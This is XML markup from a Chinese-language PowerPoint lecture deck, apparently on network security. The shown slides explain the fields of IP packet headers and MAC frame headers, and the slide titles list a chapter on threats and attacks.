                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2140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4026"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="214026"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="214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utoUpdateAnimBg="0" build="p"/>
      <p:bldP spid="214024" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="214025" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="214026"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smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包头</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215043" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="4191000"/>
            <a:ext cx="7924800" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包头部分包括源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址、目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>标志等内容。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="59396" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="2362200"/>
            <a:ext cx="5638800" cy="406400"/>
            <a:chOff x="480" y="1488"/>
            <a:chExt cx="3552" cy="256"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59401" name="Text Box 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="1488"/>
              <a:ext cx="1200" cy="256"/>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59402" name="Text Box 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1728" y="1488"/>
              <a:ext cx="1104" cy="256"/>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59403" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="480" y="1488"/>
              <a:ext cx="1248" cy="256"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF99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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215048" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="3352800"/>
            <a:ext cx="29718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源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP：202.196.53.8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215049" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="3352800"/>
            <a:ext cx="29718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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP：? ? ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215050" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="3352800"/>
            <a:ext cx="37338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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP：162.105.203.114</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215051" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="5257800"/>
            <a:ext cx="792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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFF66"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>地址通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" i="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" i="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>解析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFF66"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200">
              <a:solidFill>
                <a:srgbClr val="FFFF66"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"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5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048"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="215048"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2150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5049"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="215049"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2150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5051"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="215051"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2150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5050"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="215050"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="215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autoUpdateAnimBg="0" build="p"/>
      <p:bldP spid="215048" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="215049" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="215050" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="21505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smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>帧头</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216067" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="3962400"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>帧头部分包括源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址、目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址以及上层协议类型等内容。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60420" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="2362200"/>
            <a:ext cx="5638800" cy="406400"/>
            <a:chOff x="480" y="1488"/>
            <a:chExt cx="3552" cy="256"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60423" name="Text Box 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="1488"/>
              <a:ext cx="1200" cy="256"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>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TCP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>包头</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60424" name="Text Box 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1728" y="1488"/>
              <a:ext cx="1104" cy="256"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="folHlink"/>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IP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>包头</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60425" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="480" y="1488"/>
              <a:ext cx="1248" cy="256"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC00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spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>正确的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>MAC</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>帧头</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216072" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="3352800"/>
            <a:ext cx="41148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源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>：00-06-29-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>b3-4c-49 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216073" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="3352800"/>
            <a:ext cx="3200400" cy="466725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MAC：? ? ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma"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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2160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60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072"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="216072"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2160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6073"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="216073"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2160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utoUpdateAnimBg="0" build="p"/>
      <p:bldP spid="216072" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="216073"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sea</Template>
  <TotalTime>0</TotalTime>
  <Words>34021</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>5052</Paragraphs>
  <Slides>286</Slides>
  <Notes>166</Notes>
  <HiddenSlides>61</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80</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>286</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="398" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>华文行楷</vt:lpstr>
      <vt:lpstr>华文隶书</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>楷体_GB2312</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Lucida Sans Unicode</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>ZapfDingbats</vt:lpstr>
      <vt:lpstr>仿宋_GB2312</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Gungsuh</vt:lpstr>
      <vt:lpstr>方正舒体</vt:lpstr>
      <vt:lpstr>Bitstream Vera Sans</vt:lpstr>
      <vt:lpstr>文泉驿微米黑</vt:lpstr>
      <vt:lpstr>Antykwa Poltawskiego Light</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>楷体</vt:lpstr>
      <vt:lpstr>NanumMyeongjo</vt:lpstr>
      <vt:lpstr>FandolFang</vt:lpstr>
      <vt:lpstr>sea</vt:lpstr>
      <vt:lpstr>Visio.Drawing.11</vt:lpstr>
      <vt:lpstr>PBrush</vt:lpstr>
      <vt:lpstr>PBrush</vt:lpstr>
      <vt:lpstr>PBrush</vt:lpstr>
      <vt:lpstr>PBrush</vt:lpstr>
      <vt:lpstr>PBrush</vt:lpstr>
      <vt:lpstr>PBrush</vt:lpstr>
      <vt:lpstr>PBrush</vt:lpstr>
      <vt:lpstr>Visio.Drawing.11</vt:lpstr>
      <vt:lpstr>MS_ClipArt_Gallery.2</vt:lpstr>
      <vt:lpstr>MS_ClipArt_Gallery.2</vt:lpstr>
      <vt:lpstr>MS_ClipArt_Gallery.2</vt:lpstr>
      <vt:lpstr>MS_ClipArt_Gallery.2</vt:lpstr>
      <vt:lpstr>MS_ClipArt_Gallery.2</vt:lpstr>
      <vt:lpstr>MS_ClipArt_Gallery.2</vt:lpstr>
      <vt:lpstr>Visio.Drawing.11</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Word.Picture.8</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Visio.Drawing.6</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PBrush</vt:lpstr>
      <vt:lpstr>Paint.Picture</vt:lpstr>
      <vt:lpstr>第二章</vt:lpstr>
      <vt:lpstr>   威胁与攻击</vt:lpstr>
      <vt:lpstr>Attack Vs Threat</vt:lpstr>
      <vt:lpstr>Attack Vs Threat（续）</vt:lpstr>
      <vt:lpstr>威胁的表现形式 </vt:lpstr>
      <vt:lpstr>安全威胁分类 </vt:lpstr>
      <vt:lpstr>安全攻击方式（从信息流动的角度）</vt:lpstr>
      <vt:lpstr>攻击的种类</vt:lpstr>
